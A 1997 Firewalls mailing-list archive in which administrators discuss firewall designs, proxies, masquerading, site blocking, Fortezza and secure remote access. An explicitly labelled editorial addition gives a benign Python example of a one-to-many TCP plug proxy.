geoff From owner-firewalls-outgoing Wed Jun 4 16:52:41 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id LAA00547 for firewalls-outgoing; Wed, 4 Jun 1997 11:32:37 -0700 (PDT) Received: from alcove.wittsend.com (alcove.wittsend.com [130.205.0.20]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id LAA00430 for ; Wed, 4 Jun 1997 11:32:06 -0700 (PDT) Received: from wittsend.com (wittsend.wittsend.com [130.205.0.3]) by alcove.wittsend.com (8.8.4/8.8.4) with SMTP id OAA08723; Wed, 4 Jun 1997 14:36:14 -0400 Received: by wittsend (/\==/\ Smail3.1.28.1 #28.1) for id ; Wed, 4 Jun 97 14:35 EDT Message-Id: Subject: Re: Security Crazy To: wombat@mcfeely.bsfs.org (Rabid Wombat) Date: Wed, 4 Jun 1997 14:35:10 -0400 (EDT) From: "Michael H. Warfield" Cc: jk@stallion.ee, Firewalls@GreatCircle.COM In-Reply-To: from "Rabid Wombat" at Jun 4, 97 11:28:25 am X-Mailer: ELM [version 2.4 PL20] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Rabid Wombat enscribed thusly: > On Sun, 1 Jun 1997, Jyri Kaljundi wrote: > > Sat, 31 May 1997, Marcus J. Ranum wrote: > > >> my CEO has gone security crazy [...] win95 > > > > > > He's a bit unclear on the concept, isn't he? > > > > I am pretty sure there actually are good commercial systems available to > > make large number of win95 machines much more secure than as they are > > out-of-box. > All things are relative ... Really! It would be one hell of a challenge to make it LESS secure. Considering your starting point, you got a lot more room to work with and try to make it more secure. :-) :-) My favorite app for making Windows 95 secure is the Windows NT installation disks! :-) Or Linux, or BSD, or whatever secure operating system will do YOUR job. Mike -- Michael H. 
Warfield | (770) 985-6132 | mhw@WittsEnd.com (The Mad Wizard) | (770) 925-8248 | http://www.wittsend.com/mhw/ NIC whois: MHW9 | An optimist believes we live in the best of all PGP Key: 0xDF1DD471 | possible worlds. A pessimist is sure of it! From owner-firewalls-outgoing Wed Jun 4 17:37:35 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id KAA18757 for firewalls-outgoing; Wed, 4 Jun 1997 10:31:37 -0700 (PDT) Received: from cih-gw.cih.com (cih-gw.cih.com [204.69.206.1]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id KAA18591 for ; Wed, 4 Jun 1997 10:30:56 -0700 (PDT) Received: (from mail@localhost) by cih-gw.cih.com (8.7.6/8.6.9) id NAA04301 for ; Wed, 4 Jun 1997 13:36:29 -0400 X-Authentication-Warning: cih-gw.cih.com: mail set sender to using -f Received: from cih-gw.cih.com(204.69.206.1) via SMTP by cih-gw.cih.com, id smtpd04299aaa; Wed Jun 4 17:36:29 1997 Date: Wed, 4 Jun 1997 13:36:29 -0400 (EDT) From: "Craig I. Hagan" Reply-To: hagan@cih.com To: Firewalls@GreatCircle.COM Subject: Re: Plug-gw- One to many relationship In-Reply-To: <19970604104101.02710@capmark.funb.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > exploit a feature of some operating systems. That feature is that you can > assign many IP addresses to a single ethernet interface. I don't know how > many OS's support this, but I know SunOS doesn't and Solaris does. > [...] > > You want both clients to be able to plug to either server. To accomplish > this, assign two addresses to the firewall on the client side and two > addresses to the firewall on the server side so that you have: heck, why not make it a transparent proxy? i've done that already (ftp.cih.com:~hagan/pub/fix-kits/fwtk/trans.diff.gz [*], NB: old patches). 
the advantage there is that you don't have to have 8 batrillion entries, permit what you want and let plug-gw figure out the destination host from 'its' ip address as is given by the OS. I'll admit that i've only done this with linux, but, as many have said, solaris and other OSes should work, too. [*] #include #include -- craig ------------------------------------------------------------------------------- Craig I. Hagan "It's a small world, but I wouldn't want to back it up" hagan@cih.com "True hackers don't die, their ttl expires" "It takes a village to raise an idiot, but an idiot can raze a village" From owner-firewalls-outgoing Wed Jun 4 17:54:01 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id LAA02652 for firewalls-outgoing; Wed, 4 Jun 1997 11:44:51 -0700 (PDT) Received: from chaos.coredcs.com (chaos.coredcs.com [198.150.193.1]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id LAA02629 for ; Wed, 4 Jun 1997 11:44:38 -0700 (PDT) Received: (from jleu@localhost) by chaos.coredcs.com (8.8.5/8.8.5) id NAA29138; Wed, 4 Jun 1997 13:48:23 -0500 From: "James R. Leu" Message-Id: <199706041848.NAA29138@chaos.coredcs.com> Subject: ipfwadm / masquerading question To: klemmerj@webtrek.com Date: Wed, 4 Jun 1997 13:48:23 -0500 (CDT) Cc: firewalls@GreatCircle.COM In-Reply-To: from "Joe Klemmer" at Jun 4, 97 08:09:15 am X-Mailer: ELM [version 2.4 PL25] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I am setting up a Linux box with a v.35 card and two ethernet cards. The v.35 card is a connection to the net. The ethernet cards are connections to the public and private nets. The private net is being masqueraded, the public net is using real addresses. 
Here is the setup:

Real addresses/24 192.168.1.8/30 192.200.9.0/24 .2 .9 .10-------------------.211 | -------------- | |<-- Private Net -> <----------| ISP Router |<----------->| Customer router | -------------- | |<-- Public Net --> -------------------.1 | Real addresses/24

The problem is that IP masquerading translates the from address of packets from the hidden net to the address of the interface it will be leaving on. In this case addresses from 192.200.9.0 will be masqueraded to 192.168.1.10. Is there a way to override this default behavior? I would like the from address of packets from the private net to be translated to .1. I realize I could make the v.35 card an un-numbered interface and be done with it, but I would really like to solve this with ipfwadm. Any ideas?

James
--
James R. Leu
Network Administrator
CORE Digital Communication Services
jleu@coredcs.com

From owner-firewalls-outgoing Wed Jun 4 18:21:58 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id NAA21593 for firewalls-outgoing; Wed, 4 Jun 1997 13:28:32 -0700 (PDT) Received: from compute.com (compute.compute.com [192.215.246.2]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id NAA21548 for ; Wed, 4 Jun 1997 13:28:20 -0700 (PDT) Received: by compute.com (4.1/SMI-4.1) id AA29192; Wed, 4 Jun 97 13:31:56 PDT Message-Id: <9706042031.AA29192@compute.com> From: rob@compute.com (Robert Roell -Network Intensive) Date: Wed, 4 Jun 1997 13:31:56 -0700 X-Mailer: Mail User's Shell (7.2.3 5/22/91) To: RICK FRATACCIA , firewalls@GreatCircle.COM (IPM Return requested), msquared@hypercon.com (IPM Return requested) Subject: Re: RAPTOR WEBNOT SITE BLOCKING Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

At this time, Raptor only supports the WEBNOT facility.

rob

] [On Jun 4, RICK FRATACCIA wrote:]
] Subject: Re: RAPTOR WEBNOT SITE BLOCKING
]
] Mike,
] In reference to your comment, Do you know if cybernot will work
] with raptor 4.0 on Solaris?
Raptor personnel say that only WebNOT ] works with Raptor. ] ] Rick ] ] ______________________________ Reply Separator _________________________________ ] Subject: RAPTOR WEBNOT SITE BLOCKING ] Author: msquared@hypercon.com at SMTPMAIL ] Date: 6/3/97 7:07 PM ] ] It was written: ] " >From: Allen Rogers ] >Subject: Re: Does Raptor WebNOT Block Legitimate Sites? ] > ] > ] >This is a list that Raptor licenses directly from Microsystems. The ] actual ] >URLs used, and their abbreviated nature, is due to how Microsystems ] chooses ] >to create their list. I am trying to open a formal path where our ] customers ] >can present queries/requests to them directly for particular sites. ] I ] will ] >keep you posted." ] ] ] >CyberPatrol gives two forms at their site for 1) adding a site to ] the list of blocked sites - ] http://www.microsys.com/cybernot/form_add.htm or 2) removing a site from ] the list - http://www.microsys.com/cybernot/form_rev.htm. ] ] I've seen them take action in as little as two hours. They have always ] responded the next business day with a confirming mail note. 
] Mike
]-- End of excerpt from --

-------------------------------------------------------------
N E T W O R K   I N T E N S I V E
A Member of the Verio Group   www.ni.net
Robert Roell   Senior Internet Systems Engineer   rob@compute.com   Phone 714-450-8400
-------------------------------------------------------------

From owner-firewalls-outgoing Wed Jun 4 18:24:21 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id RAA04571 for firewalls-outgoing; Wed, 4 Jun 1997 17:31:33 -0700 (PDT) Received: from buffy.isi.net (buffy.isi.net [204.71.194.215]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id RAA04489 for ; Wed, 4 Jun 1997 17:31:15 -0700 (PDT) Received: from localhost (mike@localhost) by buffy.isi.net (8.8.5/ISI-1.5) with SMTP id RAA15747; Wed, 4 Jun 1997 17:35:05 -0700 (PDT) Date: Wed, 4 Jun 1997 17:35:05 -0700 (PDT) From: Mike Hedlund X-Sender: mike@buffy To: zzIML Firewalls cc: "'Firewalls@GreatCircle.COM'" Subject: Re: Do people host WWW servers behind firewalls? In-Reply-To: <103BEF1175D2D011B83400A0C903EE964331@hurricane.vnw.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

On Wed, 4 Jun 1997, zzIML Firewalls wrote:
> This has been an ongoing planning debate for us... does the potential
> latency and overhead of a firewall potentially point toward putting
> high-access high-performance WWW servers on the net without a firewall?
> Is there a true trade-off of "security vs. performance"?
>
A firewall doesn't necessarily mean you're secure. Carefully securing your machine(s) at a host level is a good way to start. It's amazing how many large sites out there don't do basic audits of their own sites, i.e. disabling all nonessential services, etc. The more possible entry points you eliminate for an intruder, the harder it will be for them to get in.
And by making it more difficult to get in, hopefully they have to do something which you will notice.

> Presume that the WWW servers are at a co-location ISP site and don't
> have any "critical data" on them. They are mostly publish sites...
>
I think most organizations who put money into developing a site on the net, be it web/ftp/chat or whatever, have a vested interest in keeping it secure. Not because they are worried about people seeing data they shouldn't see, but because of the publicity you will get after being hacked. I could see it now: some CEO of a big company turns on CNN to hear a story about how a 12-year-old kid hacked his company's website from school and put up a banner saying 'Im g0d'. It doesn't matter if the kid got anything important.

> What is the norm for large sites, say 10MB connected sites or DS3 (45MB)
> connected sites... Are large public WWW servers typically "behind a
> firewall" or are they in the clear? Yahoo, Microsoft, Netscape, etc?
> I mean the large sites... 1,000,000/hits a day sites? What about
> 10,000,000/hits a day?
>
Most sites that large are not connected behind a single large pipe; in fact most are distributed up around the net, so it would be possible to firewall their individual smaller sites. Although not all sites do.
-mike

From owner-firewalls-outgoing Wed Jun 4 18:45:54 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id QAA27223 for firewalls-outgoing; Wed, 4 Jun 1997 16:59:13 -0700 (PDT) Received: from miles.greatcircle.com (miles.greatcircle.com [198.102.244.34]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id QAA25483 for ; Wed, 4 Jun 1997 16:48:53 -0700 (PDT) Received: from live-oak.cycon.com (live-oak.CYCON.COM [198.202.237.69]) by miles.greatcircle.com (8.8.5/Miles-970308-2) with ESMTP id QAA27640 for ; Wed, 4 Jun 1997 16:47:12 -0700 (PDT) Received: from localhost (ardoin@localhost) by live-oak.cycon.com (8.8.5/8.7.3) with SMTP id TAA12380 for ; Wed, 4 Jun 1997 19:45:07 -0400 (EDT) X-Authentication-Warning: live-oak.cycon.com: ardoin owned process doing -bs Date: Wed, 4 Jun 1997 19:45:07 -0400 (EDT) From: Cy Ardoin To: Firewalls@GreatCircle.COM Subject: RE: PIX and FW-1 (packet filter Question) In-Reply-To: <199706041811.LAA27022@honor.greatcircle.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

I don't think there is anything an application firewall can do that can't also be done by a "packet filter" firewall. The new packet filter firewalls are not like the old Cisco/Bay router filters. The new systems operate at the network layer, but they have knowledge of the protocols and applications. They open up the packets and modify the data. These systems are doing content filtering and other "application" types of operations. Yes, not all of them do these things, but many do, and new features/functions are being added to these systems every year.

The key trade-off is performance. Network layer filters want to do everything fast. That's required when you are blocking interrupts and other low-level things. So there are some things done by application gateways that these systems are reluctant to do for performance reasons.
Nevertheless, the design doesn't prohibit packet filters from performing the functions found in most application gateways. I don't think I would want an application gateway securing a 10Mbit or 100+Mbit pipe to the Internet.

On the other side, packet filters can do things that an application gateway can't do; namely, network-to-network NAT and bi-directional NAT. Application gateways can't do these things because they must rely on the underlying OS to handle the network layer and deliver the packets to the applications. Now before I get flamed, yes, application gateways can do NAT, but only very simple NAT unless you wedge a process into the kernel to intercept packets before they reach the routing decision. But if you do that, you've just turned your application gateway into a packet filter (and you derive all the "bad" features attributed to packet filters).

--
Cy Ardoin   ardoin@cycon.com
--------------------------------------------------------------------
-- Cypress Consulting, Inc.               | Voice: 703/383-0247    ---
-- 4101 Olympic Way, Alexandria VA        | Fax:   703/383-0320    ----
-- and                                    |                        ----
-- 11240 Waples Mill Road, Suite 403,     | http://www.cycon.com/  ---
-- Fairfax, VA 22030                      |                        --
--------------------------------------------------------------------

From owner-firewalls-outgoing Wed Jun 4 19:11:36 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id LAA27517 for firewalls-outgoing; Wed, 4 Jun 1997 11:16:02 -0700 (PDT) Received: from dskfw1.funb.com ([205.152.122.10]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id LAA27450 for ; Wed, 4 Jun 1997 11:15:39 -0700 (PDT) Received: (from uucp@localhost) by dskfw1.funb.com (8.8.5/8.8.5) id OAA11040; Wed, 4 Jun 1997 14:18:48 -0400 (EDT) Received: from cm_mailhost.capmark.funb.com(168.175.82.50) by dskfw1.funb.com via smap (3.2) id xma011021; Wed, 4 Jun 97 14:18:28 -0400 Received: from funws302.capmark.funb.com (funws302 [168.175.7.54]) by cm_mailhost.capmark.funb.com (8.7.5/8.7.3) with
ESMTP id OAA05123; Wed, 4 Jun 1997 14:18:23 -0400 (EDT) Received: (mhorn@localhost) by funws302.capmark.funb.com (8.6.12/8.6.12) id OAA10294; Wed, 4 Jun 1997 14:18:22 -0400 Message-ID: <19970604141821.59906@capmark.funb.com> Date: Wed, 4 Jun 1997 14:18:21 -0400 From: "Mark Horn [ Net Ops ]" To: Anton J Aylward Cc: Firewalls@GreatCircle.COM Subject: Re: Plug-gw- One to many relationship References: <3.0.32.19970604114909.00952700@the-wire.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.75 In-Reply-To: <3.0.32.19970604114909.00952700@the-wire.com>; from Anton J Aylward on Wed, Jun 04, 1997 at 11:49:24AM -0400 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Anton J Aylward says:
>No, no, no, what *I* want and what about 10^7 other sites want is this...
>
>  client A       W          server C
>              firewall      server D
>  client B                  server F
>                            server G
>                            server H
>                            server I
>                            server K
>
>Now that's what *I* call a one to many mapping.
>You come up with a good way to do this and you'll be famous.

Well, as MJR said, it can be done. Get out your kernel hacking tools...

No matter what you do, you can *not* escape the fact that you have to tell plug-gw what the real server is. And unfortunately, with plug-gw the only place that you can store that kind of information is in the headers. So you have to come up with some sort of hack to allow for that specification. On the table there are two solutions:

o Put the real IP address of the server in the headers and have plug-gw intercept it and transparently proxy it.

o Put an alias IP address in the headers and have plug-gw interpret the translation.

If you can come up with some other way to specify the real server in the TCP/IP packet headers from the client, add it to the list. If it's straightforward enough, I'd probably implement it because I have a need for it. Of course, I wouldn't release the patch...
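[Editor's note: the following plug proxy is an added example and is not fwtk's plug-gw, nor code from Mark, Craig or anyone else in this thread. It works through the second option Mark lists, which is also what Craig describes earlier (let the proxy figure out the destination host from "its" IP address as given by the OS): the firewall holds one alias address per internal server, the client connects to an alias, and the proxy asks the OS which local endpoint the connection arrived on (getsockname()) and looks the real server up in a table. The table name ALIASES, the banner servers and the client traffic are all hypothetical; so that the demo runs anywhere without configuring alias addresses it keys the table on 127.0.0.1 plus distinct ports instead of on real alias IPs.]

```python
"""One-to-many TCP plug proxy keyed on the alias address the client dialled.

Editorial example added to this archive; not fwtk's plug-gw and not code
from anyone in the thread.  The alias table is hypothetical and, for a
run-anywhere demo, keyed on 127.0.0.1 plus distinct ports rather than on
real alias IPs; a deployment binds one listener per alias address.
"""
import socket
import threading

BUFSIZE = 4096


def resolve_target(local_endpoint, aliases):
    """Map the (ip, port) the client connected to onto the real server, or None."""
    return aliases.get(tuple(local_endpoint[:2]))


def pump(src, dst):
    """Copy src -> dst until EOF, then half-close dst so the EOF propagates."""
    try:
        while True:
            data = src.recv(BUFSIZE)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def plug(client, aliases):
    """Serve one accepted connection: look up the target, splice both directions."""
    target = resolve_target(client.getsockname(), aliases)
    if target is None:                 # unknown alias: refuse rather than guess
        client.close()
        return
    try:
        server = socket.create_connection(target, timeout=5)
    except OSError:
        client.close()
        return
    back = threading.Thread(target=pump, args=(server, client), daemon=True)
    back.start()
    pump(client, server)
    back.join()
    client.close()
    server.close()


def serve(listen_sock, handler):
    """Run an accept loop in the background; it ends when listen_sock is closed."""
    def loop():
        while True:
            try:
                conn, _ = listen_sock.accept()
            except OSError:
                return
            threading.Thread(target=handler, args=(conn,), daemon=True).start()
    threading.Thread(target=loop, daemon=True).start()


def listener(host="127.0.0.1", port=0):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.bind((host, port))
    s.listen(16)
    return s


def banner_handler(name):
    """Constructed stand-in for an internal server: echo one line with its name."""
    def handle(conn):
        with conn:
            conn.sendall(b"server " + name + b": " + conn.recv(BUFSIZE))
    return handle


def demo():
    """Two internal servers, two firewall aliases, one client per alias."""
    servers = {n: listener() for n in (b"C", b"D")}
    for name, s in servers.items():
        serve(s, banner_handler(name))
    alias_socks = {n: listener() for n in servers}          # one listener per alias
    aliases = {alias_socks[n].getsockname()[:2]: servers[n].getsockname()[:2]
               for n in servers}
    for a in alias_socks.values():
        serve(a, lambda conn: plug(conn, aliases))
    replies = {}
    for name, a in alias_socks.items():
        with socket.create_connection(a.getsockname()[:2], timeout=5) as c:
            c.sendall(b"hello\n")
            c.shutdown(socket.SHUT_WR)
            replies[name] = b"".join(iter(lambda: c.recv(BUFSIZE), b""))
    for s in list(servers.values()) + list(alias_socks.values()):
        try:
            s.shutdown(socket.SHUT_RDWR)   # wakes the accept loop so it exits
        except OSError:
            pass
        s.close()
    return replies


if __name__ == "__main__":
    for name, reply in demo().items():
        print(name.decode(), "->", reply.decode().rstrip())
```

The client dialling the "C" alias gets a reply from server C and the client dialling the "D" alias gets one from server D, with one proxy and one table rather than one plug-gw rule per client/server pair. Mark's first option (the real address in the packet headers, proxied transparently) needs the original destination from the kernel's NAT state rather than getsockname(), which is OS-specific and not shown here.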
Cheers, -- Mark Horn PGP Public Key available from: http://www.es.net/hypertext/pgp.html PGP KeyID/fingerprt: 00CBA571/32 4E 4E 48 EA C6 74 2E 25 8A 76 E6 04 A1 7F C1 From owner-firewalls-outgoing Wed Jun 4 19:12:57 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id LAA27999 for firewalls-outgoing; Wed, 4 Jun 1997 11:19:29 -0700 (PDT) Received: from miles.greatcircle.com (miles.greatcircle.com [198.102.244.34]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id LAA27710 for ; Wed, 4 Jun 1997 11:18:27 -0700 (PDT) Received: from relay1.shore.net (relay1.shore.net [192.233.85.129]) by miles.greatcircle.com (8.8.5/Miles-970308-2) with ESMTP id LAA23041 for ; Wed, 4 Jun 1997 11:13:28 -0700 (PDT) Received: from [198.115.179.81] (vin.shore.net [198.115.179.81]) by relay1.shore.net (8.8.3/8.8.3) with ESMTP id OAA22108 for ; Wed, 4 Jun 1997 14:10:13 -0400 (EDT) Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Wed, 4 Jun 1997 14:12:24 -0500 To: firewalls@greatcircle.com From: Vin McLellan Subject: Fortezza's Fate?? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Anyone out there watching Fortezza's Doom unfold? Fortezza was the US DoD's crypto (PCMCIA only?) smartcard, part of the Capstone family introduced back with the original Clipper proposal for non-classified DoD use and other US government applications -- and, for awhile, heavily promoted to the civilian US government agencies, as well as to industry. Fortezza has Skipjack symmetric crypto (160 bit keys, I think) as well as full public-key functionality, but it was designed to complement the Clipper policy, so I recall it tossed off a LEAF escrow copy of each session key to government-established secure "key warehouses" in DoD, Commerce, and Treasury, maybe among other agencies. 
I presume many of the prominent firewall vendors got involved, since for a time it looked like this was going to be the authentication device used by the US DoD, other federal government employees, and contractors accessing federal systems. Fortezza is -- was? -- also obviously a big deal for network and firewall administrators (and users) at many US government agencies. There are a lot of rumors buzzing around DC these days to the effect that NSA and the Joint Chiefs have tossed in the towel and will, within weeks, approve DoD purchases for non-Fortezza security systems, for both strong authentication, and (I presume) more standard PKI. I understand they have been briefing US.gov security staff and the contractors who have been working on Fortezza apps. I also understand that DoD is considering approving Fortezza in software applications?!? I'm seeking some perspective on what happened and why. I'm intrigued, but ill informed. (Please feel free to correct anything above.) Suerte, _Vin Vin McLellan + The Privacy Guild + 53 Nichols St., Chelsea, MA 02150 USA <617> 884-5548 -- <@><@> -- From owner-firewalls-outgoing Wed Jun 4 19:16:03 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id SAA20079 for firewalls-outgoing; Wed, 4 Jun 1997 18:50:53 -0700 (PDT) Received: from gateway.contact.com.sg (gateway.contact.com.sg [203.120.144.21]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id SAA20009 for ; Wed, 4 Jun 1997 18:50:32 -0700 (PDT) Received: from genesis.contact.com.sg ([172.20.10.86]) by gateway.contact.com.sg (Netscape Mail Server v2.02) with ESMTP id AAA11202; Thu, 5 Jun 1997 09:45:35 +0800 Received: from localhost (tsanghan@localhost) by genesis.contact.com.sg (8.8.3/8.8.3) with SMTP id JAA16150; Thu, 5 Jun 1997 09:50:39 +0800 X-Authentication-Warning: genesis.contact.com.sg: tsanghan owned process doing -bs Date: Thu, 5 Jun 1997 09:50:38 +0800 (SGT) From: tsanghan@contact.com.sg (Wong Tsang Han) To: Jose Luis 
Delgado cc: firewalls@GreatCircle.Com Subject: Re: Secure Telnet! In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk You can try http://www.datafellows.com/ On Wed, 4 Jun 1997, Jose Luis Delgado wrote: > > > Ssh (Secure Shell) is a program to log into another computer over a > > network, to execute > > commands in a remote machine, and to move files from one machine to > > another. It provides strong > > authentication and secure communications over insecure channels. > > > Hi to everyone! > > Does anybody know, where can I find shareware/freeware SECURE telnet for > NT??? > > Thanks in advance! > From owner-firewalls-outgoing Wed Jun 4 20:09:49 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id LAA00811 for firewalls-outgoing; Wed, 4 Jun 1997 11:34:18 -0700 (PDT) Received: from cpk-mail-relay1.bbnplanet.com (cpk-mail-relay1.bbnplanet.com [192.239.16.198]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id LAA00697 for ; Wed, 4 Jun 1997 11:33:46 -0700 (PDT) Received: from endeavour.transquest.com (transquest.com [206.240.42.2]) by cpk-mail-relay1.bbnplanet.com (8.7.6/MAIL-RELAY) with SMTP id OAA02895 for ; Wed, 4 Jun 1997 14:37:27 -0400 (EDT) Received: from gcs-tq.transquest.com by endeavour.transquest.com via smtpd (for cpk-mail-relay1.bbnplanet.com [192.239.16.198]) with SMTP; 4 Jun 1997 18:26:23 UT Received: from SATLMSGHUB01 by transquest.com (SMI-8.6/SMI-SVR4) id OAA17311; Wed, 4 Jun 1997 14:37:55 -0400 Received: by SATLMSGHUB01 with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.995.52) id <01BC70F5.8CB79070@SATLMSGHUB01>; Wed, 4 Jun 1997 14:42:38 -0400 Message-ID: From: "Walczak, Joe" To: "'firewalls@greatcircle.com'" Subject: RE: ISP Connection Date: Wed, 4 Jun 1997 14:39:43 -0400 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.995.52 MIME-Version: 1.0 Content-Type: 
text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

My only comment here is that I would not let ANYONE else manage/operate my firewall, ISP or not!!! Secondly, I would not tell anyone which firewall I am using. The ISP does not need to know that information.

Joe Walczak
joe.walczak@transquest.com

>----------
>From: Mariko Yashada[SMTP:mariko@grfn.org]
>Sent: Wednesday, June 04, 1997 3:01 PM
>To: Firewalls Mailing List
>Subject: Re: ISP Connection
>
>Thank you for all your comments. Last fall our plan was to connect to the Internet through MCI. We security people said fine, but you will need a firewall for any connections between the Internet and the Enterprise Network. So we did an evaluation of firewalls and settled on two we felt best suited our needs. The firewall added enough cost to the project that it was postponed. It has now been revived using our ISP for the connection with the hope the ISP can some way offer the security. I see now we should follow our original plan and put up a firewall at our end.
>
>Here is a related question:
>
>There is another local ISP who will connect us at T1 and install a firewall at our location. They will then administer the firewall remotely from their location. They support three different firewalls, Gauntlet, Firewall-1 and Borderware. The advantage is the savings in admin costs. Has anyone had any experience with this type of arrangement? We have also talked to BBN about their Site Patrol product, which is a remotely managed Gauntlet.
>
>Thanks,
>
>Mariko
>

From owner-firewalls-outgoing Wed Jun 4 20:16:29 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id TAA01241 for firewalls-outgoing; Wed, 4 Jun 1997 19:38:28 -0700 (PDT)
Received: from miles.greatcircle.com (miles.greatcircle.com [198.102.244.34]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id TAA01227 for ; Wed, 4 Jun 1997 19:38:21 -0700 (PDT)
Received: from smtp.usit.net (smtp.usit.net [199.1.48.16]) by miles.greatcircle.com (8.8.5/Miles-970308-2) with ESMTP id TAA01291 for ; Wed, 4 Jun 1997 19:44:28 -0700 (PDT)
Received: from gammag_r.ins.com (nash-max47.dynamic.usit.net [205.241.193.175]) by smtp.usit.net (8.8.5/8.8.5) with SMTP id WAA06144; Wed, 4 Jun 1997 22:42:05 -0400 (EDT)
Message-Id: <3.0.32.19970604214203.006978f4@pop.usit.net>
X-Sender: rlgammag@pop.usit.net
X-Mailer: Windows Eudora Pro Version 3.0 (32)
Date: Wed, 04 Jun 1997 21:42:06 -0500
To: uskanbye@ibmmail.com, firewalls@GreatCircle.COM
From: Robert Gammage
Subject: Re: Eagle Raptor NT 4.0 and "Local Tunnel" Config
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I have done this for nonGSPable (nice nonword huh) protocols. Check out http://www.raptor.com/cs/FAQ/entv4localtunnel.htm for a nicely detailed FAQ.

The only gotchas I recall:

(1) I felt it odd that the application proxies and GW-Control come up completely, and then (later) the tunnels are fired up even though they operate at a lower level (interface-filters, tunnels, then GW-Control in that order).

(2) If you define Universe (0.0.0.0/0) as one of the Secure Subnets, it has to be on the "A" end of the tunnel (this is a bug) or GW Control will complain about an illegal network in the log during startup.

(3) A tunnel with no filters applied moves everything that meets the address (Source or Destination secure-subnet) criteria.
Once you apply a filter (or group of filters) you have then limited the traffic allowed to pass through the tunnel.

Otherwise, they are pretty straight-forward and fairly insecure.

At 05:13 PM 6/4/97 EDT, uskanbye@ibmmail.com wrote:
>
>Anybody out there using the local (null) tunnel feature in the Eagle NT 4.0 firewall? We're attempting to configure this, in conjunction with filters, to pass some protocols that can't be GSP'd (Data Link Switching/DLSw).
>
>Any advice/comments/suggestions welcomed. Thanks!
>
>
> --------KANSAS DEPARTMENT OF HEALTH & ENVIRONMENT---------
> ---------------WWW.STATE.KS.US/PUBLIC/KDHE----------------
> --------------Landon State Office Building----------------
> ------------------Phone (913) 296-5643--------------------
>
>

Robert (Bob) Gammage                 BAROQUE (adj):
Network Systems Engineer             When you are
International Network Services       out of Monet.
615-783-1652
Pager 800 INS-1-INS

From owner-firewalls-outgoing Wed Jun 4 20:24:51 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id LAA25119 for firewalls-outgoing; Wed, 4 Jun 1997 11:04:50 -0700 (PDT)
Received: from firewall1-int.glaxowellcome.com (firewall1.glaxowellcome.com [192.58.204.204]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id LAA24848 for ; Wed, 4 Jun 1997 11:03:58 -0700 (PDT)
Received: by firewall1-int.glaxowellcome.com id OAA09690; Wed, 4 Jun 1997 14:10:27 -0400 (EDT)
Received: from ussun2m.glaxo.com(152.51.20.99) by firewall1.glaxo.com via smap (3.2) id xma009683; Wed, 4 Jun 97 14:10:04 -0400
Received: by ussun2m.glaxo.com id OAA15665; Wed, 4 Jun 1997 14:05:29 -0400 (EDT)
Received: from ussun2f by ussun2f.usglx (SMI-8.6/SMI-SVR4) id OAA02324; Wed, 4 Jun 1997 14:04:23 -0400
Date: Wed, 4 Jun 1997 14:04:23 -0400 (EDT)
From: "Gary G.
Hull"
X-Sender: ggh14854@ussun2f
To: Stan Wnuck
